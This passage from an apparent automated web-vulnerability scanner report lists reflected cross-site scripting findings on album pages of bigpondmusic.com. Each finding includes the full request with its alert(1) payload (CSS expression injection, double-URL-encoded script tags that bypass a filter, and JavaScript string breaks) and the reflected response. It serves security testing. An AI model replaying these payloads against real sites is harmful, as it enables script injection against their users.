Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87850


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumb225c';bfd4f81406a';
   s.prop4 = 'jebediah';
   s.prop5 = 'lost-my-nerve';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 +
...[SNIP]...

2.71. http://bigpondmusic.com/album/jebediah/lost-my-nerve [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/jebediah/lost-my-nerve

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c136"style%3d"x%3aexpression(alert(1))"9fa3aac2c39 was submitted in the h parameter. This input was echoed as 4c136"style="x:expression(alert(1))"9fa3aac2c39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/jebediah/lost-my-nerve?h=7663953484c136"style%3d"x%3aexpression(alert(1))"9fa3aac2c39 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 97105


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Jebediah - Lost My Nerve - B
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/jebediah/lost-my-nerve?h=7663953484c136"style="x:expression(alert(1))"9fa3aac2c39" />
...[SNIP]...

2.72. http://bigpondmusic.com/album/jebediah/lost-my-nerve [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/jebediah/lost-my-nerve

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14bc1"style%3d"x%3aexpression(alert(1))"5bf96062524 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14bc1"style="x:expression(alert(1))"5bf96062524 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/jebediah/lost-my-nerve?14bc1"style%3d"x%3aexpression(alert(1))"5bf96062524=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:26:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 96924


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Jebediah - Lost My Nerve - B
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/jebediah/lost-my-nerve?14bc1"style="x:expression(alert(1))"5bf96062524=1" />
...[SNIP]...

2.73. http://bigpondmusic.com/album/katy-perry/teenage-dream2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/katy-perry/teenage-dream2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97338'%3ba8b005e798b was submitted in the REST URL parameter 1. This input was echoed as 97338';a8b005e798b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album97338'%3ba8b005e798b/katy-perry/teenage-dream2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:24:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87906


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album97338';a8b005e798b';
   s.prop4 = 'katy-perry';
   s.prop5 = 'teenage-dream2';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3
...[SNIP]...

2.74. http://bigpondmusic.com/album/katy-perry/teenage-dream2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/katy-perry/teenage-dream2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91242%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e88b03c31949 was submitted in the REST URL parameter 1. This input was echoed as 91242"><script>alert(1)</script>88b03c31949 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album91242%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e88b03c31949/katy-perry/teenage-dream2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88218


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album91242"><script>alert(1)</script>88b03c31949/katy-perry/teenage-dream2" />
...[SNIP]...

2.75. http://bigpondmusic.com/album/katy-perry/teenage-dream2 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/katy-perry/teenage-dream2

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d910c"style%3d"x%3aexpression(alert(1))"024dde3346f was submitted in the h parameter. This input was echoed as d910c"style="x:expression(alert(1))"024dde3346f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/katy-perry/teenage-dream2?h=721914442d910c"style%3d"x%3aexpression(alert(1))"024dde3346f HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 119924


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Katy Perry - Teenage Dream -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/katy-perry/teenage-dream2?h=721914442d910c"style="x:expression(alert(1))"024dde3346f" />
...[SNIP]...

2.76. http://bigpondmusic.com/album/katy-perry/teenage-dream2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/katy-perry/teenage-dream2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c9b0"style%3d"x%3aexpression(alert(1))"852375c399a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c9b0"style="x:expression(alert(1))"852375c399a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/katy-perry/teenage-dream2?7c9b0"style%3d"x%3aexpression(alert(1))"852375c399a=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 119868


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Katy Perry - Teenage Dream -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/katy-perry/teenage-dream2?7c9b0"style="x:expression(alert(1))"852375c399a=1" />
...[SNIP]...

2.77. http://bigpondmusic.com/album/ke-ha/we-r-who-we-r [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/ke-ha/we-r-who-we-r

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1527c'%3b7ca3ed36b7c was submitted in the REST URL parameter 1. This input was echoed as 1527c';7ca3ed36b7c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album1527c'%3b7ca3ed36b7c/ke-ha/we-r-who-we-r HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88208


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album1527c';7ca3ed36b7c';
   s.prop4 = 'ke-ha';
   s.prop5 = 'we-r-who-we-r';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|'
...[SNIP]...

2.78. http://bigpondmusic.com/album/ke-ha/we-r-who-we-r [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/ke-ha/we-r-who-we-r

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8492d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f6f8063291 was submitted in the REST URL parameter 1. This input was echoed as 8492d"><script>alert(1)</script>9f6f8063291 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album8492d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f6f8063291/ke-ha/we-r-who-we-r HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87992


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album8492d"><script>alert(1)</script>9f6f8063291/ke-ha/we-r-who-we-r" />
...[SNIP]...

2.79. http://bigpondmusic.com/album/ke-ha/we-r-who-we-r [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/ke-ha/we-r-who-we-r

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eba52"style%3d"x%3aexpression(alert(1))"bbd03f69418 was submitted in the h parameter. This input was echoed as eba52"style="x:expression(alert(1))"bbd03f69418 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/ke-ha/we-r-who-we-r?h=761402717eba52"style%3d"x%3aexpression(alert(1))"bbd03f69418 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 105180


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Ke$ha - We R Who We R - BigP
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/ke-ha/we-r-who-we-r?h=761402717eba52"style="x:expression(alert(1))"bbd03f69418" />
...[SNIP]...

2.80. http://bigpondmusic.com/album/ke-ha/we-r-who-we-r [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/ke-ha/we-r-who-we-r

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 310e7"style%3d"x%3aexpression(alert(1))"8dd416912c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 310e7"style="x:expression(alert(1))"8dd416912c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/ke-ha/we-r-who-we-r?310e7"style%3d"x%3aexpression(alert(1))"8dd416912c4=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 105489


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Ke$ha - We R Who We R - BigP
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/ke-ha/we-r-who-we-r?310e7"style="x:expression(alert(1))"8dd416912c4=1" />
...[SNIP]...

2.81. http://bigpondmusic.com/album/keith-urban/get-closer3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/keith-urban/get-closer3

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd5fb'%3bae57aea958d was submitted in the REST URL parameter 1. This input was echoed as dd5fb';ae57aea958d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumdd5fb'%3bae57aea958d/keith-urban/get-closer3 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88137


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumdd5fb';ae57aea958d';
   s.prop4 = 'keith-urban';
   s.prop5 = 'get-closer3';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 +
...[SNIP]...

2.82. http://bigpondmusic.com/album/keith-urban/get-closer3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/keith-urban/get-closer3

Issue detail

